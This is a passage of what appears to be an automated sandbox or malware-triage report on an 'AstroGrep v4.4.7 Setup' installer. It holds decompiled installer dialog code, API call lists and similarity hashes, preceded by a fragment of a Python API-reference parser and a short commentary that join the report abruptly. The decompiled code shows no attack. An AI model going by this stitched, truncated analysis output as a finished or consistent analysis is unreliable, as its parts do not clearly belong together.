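    return out

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_API_REFS)))
    print("clipboard:", clipboard_directions(parse_api_refs(SAMPLE_API_REFS)))
```

The GlobalAlloc flag 0x42 in the listing is GMEM_MOVEABLE | GMEM_ZEROINIT, the movable block SetClipboardData expects, which is consistent with the write direction the parser reports. A function that only reads the clipboard would show GetClipboardData between OpenClipboard and CloseClipboard, and the second sequence in the example catches that case.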
Strings
• AstroGrep v4.4.7 Setup , xrefs: 00405376
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
• String ID: AstroGrep v4.4.7 Setup
• API String ID: 4154960007-2178112666
• Opcode ID: b94e12a8617ae1be9cc25c09676e899251da99f6313db78d6ff988929f539234
• Instruction ID: b5f1ce2ce4d05df4ba5ebffd303825d409c0ca4f752acec20acacd4dcda6ac6e
• Opcode Fuzzy Hash: b94e12a8617ae1be9cc25c09676e899251da99f6313db78d6ff988929f539234
• Instruction Fuzzy Hash: C9A14871900208BFEB119FA0DD89AAE7F79FB08354F10407AFA01BA1A0C7755E51DF69
Uniqueness
• Uniqueness Score: -1.00%
C-Code - Quality: 96%
                                                                                                            			E004048C5(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				struct HWND__* _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				signed char* _v28;
                                                                                                            				long _v32;
                                                                                                            				signed int _v40;
                                                                                                            				int _v44;
                                                                                                            				signed int* _v56;
                                                                                                            				signed char* _v60;
                                                                                                            				signed int _v64;
                                                                                                            				long _v68;
                                                                                                            				void* _v72;
                                                                                                            				intOrPtr _v76;
                                                                                                            				intOrPtr _v80;
                                                                                                            				void* _v84;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t192;
                                                                                                            				int _t194;
                                                                                                            				intOrPtr _t195;
                                                                                                            				intOrPtr _t197;
                                                                                                            				long _t201;
                                                                                                            				signed int _t205;
                                                                                                            				signed int _t216;
                                                                                                            				void* _t219;
                                                                                                            				void* _t220;
                                                                                                            				int _t226;
                                                                                                            				signed int _t231;
                                                                                                            				signed int _t232;
                                                                                                            				signed int _t233;
                                                                                                            				signed int _t239;
                                                                                                            				signed int _t241;
                                                                                                            				signed char _t242;
                                                                                                            				signed char _t248;
                                                                                                            				void* _t252;
                                                                                                            				void* _t254;
                                                                                                            				signed char* _t270;
                                                                                                            				signed char _t271;
                                                                                                            				long _t273;
                                                                                                            				long _t276;
                                                                                                            				int _t277;
                                                                                                            				int _t279;
                                                                                                            				int _t282;
                                                                                                            				signed int _t283;
                                                                                                            				long _t284;
                                                                                                            				signed int _t287;
                                                                                                            				signed int _t294;
                                                                                                            				int _t295;
                                                                                                            				int _t296;
                                                                                                            				signed char* _t302;
                                                                                                            				struct HWND__* _t306;
                                                                                                            				int _t307;
                                                                                                            				signed int* _t308;
                                                                                                            				int _t309;
                                                                                                            				long _t310;
                                                                                                            				signed int _t311;
                                                                                                            				void* _t313;
                                                                                                            				long _t314;
                                                                                                            				int _t315;
                                                                                                            				signed int _t316;
                                                                                                            				void* _t318;
                                                                                                            
                                                                                                            				_t306 = _a4;
                                                                                                            				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                                                            				_v8 = GetDlgItem(_t306, 0x408);
                                                                                                            				_t318 = SendMessageA;
                                                                                                            				_v20 =  *0x42e428;
                                                                                                            				_t282 = 0;
                                                                                                            				_v24 =  *0x42e410 + 0x94;
                                                                                                            				if(_a8 != 0x110) {
                                                                                                            					L23:
                                                                                                            					if(_a8 != 0x405) {
                                                                                                            						_t285 = _a16;
                                                                                                            					} else {
                                                                                                            						_a12 = _t282;
                                                                                                            						_t285 = 1;
                                                                                                            						_a8 = 0x40f;
                                                                                                            						_a16 = 1;
                                                                                                            					}
                                                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                            						_v16 = _t285;
                                                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                                                            							if(( *0x42e419 & 0x00000002) != 0) {
                                                                                                            								L41:
                                                                                                            								if(_v16 != _t282) {
                                                                                                            									_t231 = _v16;
                                                                                                            									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                                                                                            										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                                                                            									}
                                                                                                            									_t232 = _v16;
                                                                                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                                                                                            										_t285 = _v20;
                                                                                                            										_t233 =  *(_t232 + 0x5c);
                                                                                                            										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
                                                                                                            										} else {
                                                                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L48;
                                                                                                            							}
                                                                                                            							if(_a8 == 0x413) {
                                                                                                            								L33:
                                                                                                            								_t285 = 0 | _a8 != 0x00000413;
                                                                                                            								_t239 = E00404813(_v8, _a8 != 0x413);
                                                                                                            								_t311 = _t239;
                                                                                                            								if(_t311 >= _t282) {
                                                                                                            									_t88 = _v20 + 8; // 0x8
                                                                                                            									_t285 = _t239 * 0x418 + _t88;
                                                                                                            									_t241 =  *_t285;
                                                                                                            									if((_t241 & 0x00000010) == 0) {
                                                                                                            										if((_t241 & 0x00000040) == 0) {
                                                                                                            											_t242 = _t241 ^ 0x00000001;
                                                                                                            										} else {
                                                                                                            											_t248 = _t241 ^ 0x00000080;
                                                                                                            											if(_t248 >= 0) {
                                                                                                            												_t242 = _t248 & 0x000000fe;
                                                                                                            											} else {
                                                                                                            												_t242 = _t248 | 0x00000001;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										 *_t285 = _t242;
                                                                                                            										E0040117D(_t311);
                                                                                                            										_a12 = _t311 + 1;
                                                                                                            										_a16 =  !( *0x42e418) >> 0x00000008 & 0x00000001;
                                                                                                            										_a8 = 0x40f;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L41;
                                                                                                            							}
                                                                                                            							_t285 = _a16;
                                                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                            								goto L41;
                                                                                                            							}
                                                                                                            							goto L33;
                                                                                                            						} else {
                                                                                                            							goto L48;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L48:
                                                                                                            						if(_a8 != 0x111) {
                                                                                                            							L56:
                                                                                                            							if(_a8 == 0x200) {
                                                                                                            								SendMessageA(_v8, 0x200, _t282, _t282);
                                                                                                            							}
                                                                                                            							if(_a8 == 0x40b) {
                                                                                                            								_t219 =  *0x42984c; // 0x0
                                                                                                            								if(_t219 != _t282) {
                                                                                                            									ImageList_Destroy(_t219);
                                                                                                            								}
                                                                                                            								_t220 =  *0x429860; // 0x0
                                                                                                            								if(_t220 != _t282) {
                                                                                                            									GlobalFree(_t220);
                                                                                                            								}
                                                                                                            								 *0x42984c = _t282;
                                                                                                            								 *0x429860 = _t282;
                                                                                                            								 *0x42e460 = _t282;
                                                                                                            							}
                                                                                                            							if(_a8 != 0x40f) {
                                                                                                            								L88:
                                                                                                            								if(_a8 == 0x420 && ( *0x42e419 & 0x00000001) != 0) {
                                                                                                            									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                                                            									ShowWindow(_v8, _t307);
                                                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                                                            								}
                                                                                                            								goto L91;
                                                                                                            							} else {
                                                                                                            								E004011EF(_t285, _t282, _t282);
                                                                                                            								_t192 = _a12;
                                                                                                            								if(_t192 != _t282) {
                                                                                                            									if(_t192 != 0xffffffff) {
                                                                                                            										_t192 = _t192 - 1;
                                                                                                            									}
                                                                                                            									_push(_t192);
                                                                                                            									_push(8);
                                                                                                            									E00404893();
                                                                                                            								}
                                                                                                            								if(_a16 == _t282) {
                                                                                                            									L75:
                                                                                                            									E004011EF(_t285, _t282, _t282);
                                                                                                            									_t194 =  *0x429860; // 0x0
                                                                                                            									_v32 = _t194;
                                                                                                            									_t195 =  *0x42e428;
                                                                                                            									_v60 = 0xf030;
                                                                                                            									_v20 = _t282;
                                                                                                            									if( *0x42e42c <= _t282) {
                                                                                                            										L86:
                                                                                                            										InvalidateRect(_v8, _t282, 1);
                                                                                                            										_t197 =  *0x42dbdc; // 0x6fdecd
                                                                                                            										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                                                                            											E004047CE(0x3ff, 0xfffffffb, E004047E6(5));
                                                                                                            										}
                                                                                                            										goto L88;
                                                                                                            									}
                                                                                                            									_t308 = _t195 + 8;
                                                                                                            									do {
                                                                                                            										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                                                            										if(_t201 != _t282) {
                                                                                                            											_t287 =  *_t308;
                                                                                                            											_v68 = _t201;
                                                                                                            											_v72 = 8;
                                                                                                            											if((_t287 & 0x00000001) != 0) {
                                                                                                            												_v72 = 9;
                                                                                                            												_v56 =  &(_t308[4]);
                                                                                                            												_t308[0] = _t308[0] & 0x000000fe;
                                                                                                            											}
                                                                                                            											if((_t287 & 0x00000040) == 0) {
                                                                                                            												_t205 = (_t287 & 0x00000001) + 1;
                                                                                                            												if((_t287 & 0x00000010) != 0) {
                                                                                                            													_t205 = _t205 + 3;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t205 = 3;
                                                                                                            											}
                                                                                                            											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                                                            											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                            											SendMessageA(_v8, 0x110d, _t282,  &_v72); // executed
                                                                                                            										}
                                                                                                            										_v20 = _v20 + 1;
                                                                                                            										_t308 =  &(_t308[0x106]);
                                                                                                            									} while (_v20 <  *0x42e42c);
                                                                                                            									goto L86;
                                                                                                            								} else {
                                                                                                            									_t309 = E004012E2( *0x429860);
                                                                                                            									E00401299(_t309);
                                                                                                            									_t216 = 0;
                                                                                                            									_t285 = 0;
                                                                                                            									if(_t309 <= _t282) {
                                                                                                            										L74:
                                                                                                            										SendMessageA(_v12, 0x14e, _t285, _t282);
                                                                                                            										_a16 = _t309;
                                                                                                            										_a8 = 0x420;
                                                                                                            										goto L75;
                                                                                                            									} else {
                                                                                                            										goto L71;
                                                                                                            									}
                                                                                                            									do {
                                                                                                            										L71:
                                                                                                            										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                                                            											_t285 = _t285 + 1;
                                                                                                            										}
                                                                                                            										_t216 = _t216 + 1;
                                                                                                            									} while (_t216 < _t309);
                                                                                                            									goto L74;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                            							goto L91;
                                                                                                            						} else {
                                                                                                            							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                                                                                            							if(_t226 == 0xffffffff) {
                                                                                                            								goto L91;
                                                                                                            							}
                                                                                                            							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                                                                                            							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                                                            								_t310 = 0x20;
                                                                                                            							}
                                                                                                            							E00401299(_t310);
                                                                                                            							SendMessageA(_a4, 0x420, _t282, _t310);
                                                                                                            							_a12 = _a12 | 0xffffffff;
                                                                                                            							_a16 = _t282;
                                                                                                            							_a8 = 0x40f;
                                                                                                            							goto L56;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_v32 = 0;
                                                                                                            					_v16 = 2;
                                                                                                            					 *0x42e460 = _t306;
                                                                                                            					 *0x429860 = GlobalAlloc(0x40,  *0x42e42c << 2);
                                                                                                            					_t252 = LoadBitmapA( *0x42e400, 0x6e);
                                                                                                            					 *0x429854 =  *0x429854 | 0xffffffff;
                                                                                                            					_t313 = _t252;
                                                                                                            					 *0x42985c = SetWindowLongA(_v8, 0xfffffffc, E00404EBC); // executed
                                                                                                            					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0); // executed
                                                                                                            					 *0x42984c = _t254;
                                                                                                            					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                                                            					SendMessageA(_v8, 0x1109, 2,  *0x42984c);
                                                                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                            					}
                                                                                                            					DeleteObject(_t313);
                                                                                                            					_t314 = 0;
                                                                                                            					do {
                                                                                                            						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                                                            						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                                                            							if(_t314 != 0x20) {
                                                                                                            								_v16 = _t282;
                                                                                                            							}
                                                                                                            							_t279 = SendMessageA(_v12, 0x143, _t282, E00405D51(_t282, _t314, _t318, _t282, _t260)); // executed
                                                                                                            							SendMessageA(_v12, 0x151, _t279, _t314);
                                                                                                            						}
                                                                                                            						_t314 = _t314 + 1;
                                                                                                            					} while (_t314 < 0x21);
                                                                                                            					_t315 = _a16;
                                                                                                            					_t283 = _v16;
                                                                                                            					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                                                            					_push(0x15);
                                                                                                            					E00403F14(_a4);
                                                                                                            					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                                                            					_push(0x16);
                                                                                                            					E00403F14(_a4);
                                                                                                            					_t316 = 0;
                                                                                                            					_t284 = 0;
                                                                                                            					if( *0x42e42c <= 0) {
                                                                                                            						L19:
                                                                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                            						goto L20;
                                                                                                            					} else {
                                                                                                            						_t302 = _v20 + 8;
                                                                                                            						_v28 = _t302;
                                                                                                            						do {
                                                                                                            							_t270 =  &(_t302[0x10]);
                                                                                                            							if( *_t270 != 0) {
                                                                                                            								_v60 = _t270;
                                                                                                            								_t271 =  *_t302;
                                                                                                            								_t294 = 0x20;
                                                                                                            								_v84 = _t284;
                                                                                                            								_v80 = 0xffff0002;
                                                                                                            								_v76 = 0xd;
                                                                                                            								_v64 = _t294;
                                                                                                            								_v40 = _t316;
                                                                                                            								_v68 = _t271 & _t294;
                                                                                                            								if((_t271 & 0x00000002) == 0) {
                                                                                                            									if((_t271 & 0x00000004) == 0) {
                                                                                                            										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                            										_t295 =  *0x429860; // 0x0
                                                                                                            										 *(_t295 + _t316 * 4) = _t273;
                                                                                                            									} else {
                                                                                                            										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_v76 = 0x4d;
                                                                                                            									_v44 = 1;
                                                                                                            									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                            									_t296 =  *0x429860; // 0x0
                                                                                                            									_v32 = 1;
                                                                                                            									 *(_t296 + _t316 * 4) = _t276;
                                                                                                            									_t277 =  *0x429860; // 0x0
                                                                                                            									_t284 =  *(_t277 + _t316 * 4);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t316 = _t316 + 1;
                                                                                                            							_t302 =  &(_v28[0x418]);
                                                                                                            							_v28 = _t302;
                                                                                                            						} while (_t316 <  *0x42e42c);
                                                                                                            						if(_v32 != 0) {
                                                                                                            							L20:
                                                                                                            							if(_v16 != 0) {
                                                                                                            								E00403F49(_v8);
                                                                                                            								_t282 = 0;
                                                                                                            								goto L23;
                                                                                                            							} else {
                                                                                                            								ShowWindow(_v12, 5);
                                                                                                            								E00403F49(_v12);
                                                                                                            								L91:
                                                                                                            								return E00403F7B(_a8, _a12, _a16);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x00404ea5
                                                                                                            0x00404ea5
                                                                                                            0x00000000
                                                                                                            0x00404d19
                                                                                                            0x00404d1b
                                                                                                            0x00404d20
                                                                                                            0x00404d25
                                                                                                            0x00404d2a
                                                                                                            0x00404d2c
                                                                                                            0x00404d2c
                                                                                                            0x00404d2d
                                                                                                            0x00404d2e
                                                                                                            0x00404d30
                                                                                                            0x00404d30
                                                                                                            0x00404d38
                                                                                                            0x00404d79
                                                                                                            0x00404d7b
                                                                                                            0x00404d80
                                                                                                            0x00404d8b
                                                                                                            0x00404d8e
                                                                                                            0x00404d93
                                                                                                            0x00404d9a
                                                                                                            0x00404d9d
                                                                                                            0x00404e3f
                                                                                                            0x00404e45
                                                                                                            0x00404e4b
                                                                                                            0x00404e53
                                                                                                            0x00404e64
                                                                                                            0x00404e64
                                                                                                            0x00000000
                                                                                                            0x00404e53
                                                                                                            0x00404da3
                                                                                                            0x00404da6
                                                                                                            0x00404dac
                                                                                                            0x00404db1
                                                                                                            0x00404db3
                                                                                                            0x00404db5
                                                                                                            0x00404dbb
                                                                                                            0x00404dc2
                                                                                                            0x00404dc7
                                                                                                            0x00404dce
                                                                                                            0x00404dd1
                                                                                                            0x00404dd1
                                                                                                            0x00404dd8
                                                                                                            0x00404de4
                                                                                                            0x00404de8
                                                                                                            0x00404dea
                                                                                                            0x00404dea
                                                                                                            0x00404dda
                                                                                                            0x00404ddc
                                                                                                            0x00404ddc
                                                                                                            0x00404e0a
                                                                                                            0x00404e16
                                                                                                            0x00404e25
                                                                                                            0x00404e25
                                                                                                            0x00404e27
                                                                                                            0x00404e2a
                                                                                                            0x00404e33
                                                                                                            0x00000000
                                                                                                            0x00404d3a
                                                                                                            0x00404d45
                                                                                                            0x00404d48
                                                                                                            0x00404d4d
                                                                                                            0x00404d4f
                                                                                                            0x00404d53
                                                                                                            0x00404d63
                                                                                                            0x00404d6d
                                                                                                            0x00404d6f
                                                                                                            0x00404d72
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404d55
                                                                                                            0x00404d55
                                                                                                            0x00404d5b
                                                                                                            0x00404d5d
                                                                                                            0x00404d5d
                                                                                                            0x00404d5e
                                                                                                            0x00404d5f
                                                                                                            0x00000000
                                                                                                            0x00404d55
                                                                                                            0x00404d38
                                                                                                            0x00404d13
                                                                                                            0x00404c56
                                                                                                            0x00000000
                                                                                                            0x00404c6c
                                                                                                            0x00404c76
                                                                                                            0x00404c7b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404c8d
                                                                                                            0x00404c92
                                                                                                            0x00404c9e
                                                                                                            0x00404c9e
                                                                                                            0x00404ca0
                                                                                                            0x00404caf
                                                                                                            0x00404cb1
                                                                                                            0x00404cb5
                                                                                                            0x00404cb8
                                                                                                            0x00000000
                                                                                                            0x00404cb8
                                                                                                            0x00404c56
                                                                                                            0x00404917
                                                                                                            0x0040491c
                                                                                                            0x00404925
                                                                                                            0x0040492c
                                                                                                            0x0040493a
                                                                                                            0x00404945
                                                                                                            0x0040494b
                                                                                                            0x00404959
                                                                                                            0x0040496d
                                                                                                            0x00404972
                                                                                                            0x0040497f
                                                                                                            0x00404984
                                                                                                            0x0040499a
                                                                                                            0x004049ab
                                                                                                            0x004049b8
                                                                                                            0x004049b8
                                                                                                            0x004049bb
                                                                                                            0x004049c1
                                                                                                            0x004049c3
                                                                                                            0x004049c6
                                                                                                            0x004049cb
                                                                                                            0x004049d0
                                                                                                            0x004049d2
                                                                                                            0x004049d2
                                                                                                            0x004049e6
                                                                                                            0x004049f2
                                                                                                            0x004049f2
                                                                                                            0x004049f4
                                                                                                            0x004049f5
                                                                                                            0x004049fa
                                                                                                            0x004049fd
                                                                                                            0x00404a00
                                                                                                            0x00404a04
                                                                                                            0x00404a09
                                                                                                            0x00404a0e
                                                                                                            0x00404a12
                                                                                                            0x00404a17
                                                                                                            0x00404a1c
                                                                                                            0x00404a1e
                                                                                                            0x00404a26
                                                                                                            0x00404af0
                                                                                                            0x00404b03
                                                                                                            0x00000000
                                                                                                            0x00404a2c
                                                                                                            0x00404a2f
                                                                                                            0x00404a32
                                                                                                            0x00404a35
                                                                                                            0x00404a35
                                                                                                            0x00404a3b
                                                                                                            0x00404a41
                                                                                                            0x00404a44
                                                                                                            0x00404a4a
                                                                                                            0x00404a4b
                                                                                                            0x00404a50
                                                                                                            0x00404a59
                                                                                                            0x00404a60
                                                                                                            0x00404a63
                                                                                                            0x00404a66
                                                                                                            0x00404a69
                                                                                                            0x00404aa5
                                                                                                            0x00404ac6
                                                                                                            0x00404ac8
                                                                                                            0x00404ace
                                                                                                            0x00404aa7
                                                                                                            0x00404ab4
                                                                                                            0x00404ab4
                                                                                                            0x00404a6b
                                                                                                            0x00404a6e
                                                                                                            0x00404a7d
                                                                                                            0x00404a87
                                                                                                            0x00404a89
                                                                                                            0x00404a8f
                                                                                                            0x00404a96
                                                                                                            0x00404a99
                                                                                                            0x00404a9e
                                                                                                            0x00404a9e
                                                                                                            0x00404a69
                                                                                                            0x00404ad4
                                                                                                            0x00404ad5
                                                                                                            0x00404ae1
                                                                                                            0x00404ae1
                                                                                                            0x00404aee
                                                                                                            0x00404b09
                                                                                                            0x00404b0d
                                                                                                            0x00404b2a
                                                                                                            0x00404b2f
                                                                                                            0x00000000
                                                                                                            0x00404b0f
                                                                                                            0x00404b14
                                                                                                            0x00404b1d
                                                                                                            0x00404ea7
                                                                                                            0x00404eb9
                                                                                                            0x00404eb9
                                                                                                            0x00404b0d
                                                                                                            0x00000000
                                                                                                            0x00404aee
                                                                                                            0x00404a26

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004048DD
                                                                                                            • GetDlgItem.USER32 ref: 004048E8
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                            • LoadBitmapA.USER32 ref: 00404945
                                                                                                            • SetWindowLongA.USER32 ref: 0040495E
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                            • GetWindowLongA.USER32 ref: 00404AF5
                                                                                                            • SetWindowLongA.USER32 ref: 00404B03
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                            • GlobalFree.KERNEL32 ref: 00404CF4
                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                            • GetDlgItem.USER32 ref: 00404E9E
                                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00404352(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				long _v16;
                                                                                                            				long _v20;
                                                                                                            				long _v24;
                                                                                                            				union _ULARGE_INTEGER _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				long _v36;
                                                                                                            				union _ULARGE_INTEGER _v40;
                                                                                                            				unsigned int _v44;
                                                                                                            				union _ULARGE_INTEGER _v48;
                                                                                                            				CHAR* _v56;
                                                                                                            				intOrPtr _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				intOrPtr _v68;
                                                                                                            				CHAR* _v72;
                                                                                                            				void _v76;
                                                                                                            				struct HWND__* _v80;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t82;
                                                                                                            				long _t87;
                                                                                                            				signed char* _t89;
                                                                                                            				void* _t95;
                                                                                                            				signed int _t96;
                                                                                                            				struct %anon54 _t109;
                                                                                                            				signed char _t114;
                                                                                                            				signed int _t118;
                                                                                                            				struct HWND__** _t122;
                                                                                                            				CHAR* _t146;
                                                                                                            				intOrPtr _t147;
                                                                                                            				unsigned int _t150;
                                                                                                            				signed int _t152;
                                                                                                            				unsigned int _t156;
                                                                                                            				signed int _t158;
                                                                                                            				signed int* _t159;
                                                                                                            				signed char* _t160;
                                                                                                            				long _t165;
                                                                                                            				struct HWND__* _t166;
                                                                                                            				int _t168;
                                                                                                            				unsigned int _t197;
                                                                                                            				void* _t205;
                                                                                                            
                                                                                                            				_t156 = __edx;
                                                                                                            				_t82 =  *0x429040; // 0x6eafd4
                                                                                                            				_v32 = _t82;
                                                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
                                                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                            				if(_a8 == 0x40b) {
                                                                                                            					E00405509(0x3fb, _t146);
                                                                                                            					E00405F9A(_t146);
                                                                                                            				}
                                                                                                            				_t166 = _a4;
                                                                                                            				if(_a8 != 0x110) {
                                                                                                            					L8:
                                                                                                            					if(_a8 != 0x111) {
                                                                                                            						L20:
                                                                                                            						if(_a8 == 0x40f) {
                                                                                                            							L22:
                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                            							E00405509(0x3fb, _t146);
                                                                                                            							if(E0040588F(_t185, _t146) == 0) {
                                                                                                            								_v8 = 1;
                                                                                                            							}
                                                                                                            							E00405D2F(0x428838, _t146);
                                                                                                            							_t87 = E004060C8(1);
                                                                                                            							_v16 = _t87;
                                                                                                            							if(_t87 == 0) {
                                                                                                            								L30:
                                                                                                            								E00405D2F(0x428838, _t146);
                                                                                                            								_t89 = E0040583A(0x428838);
                                                                                                            								_t158 = 0;
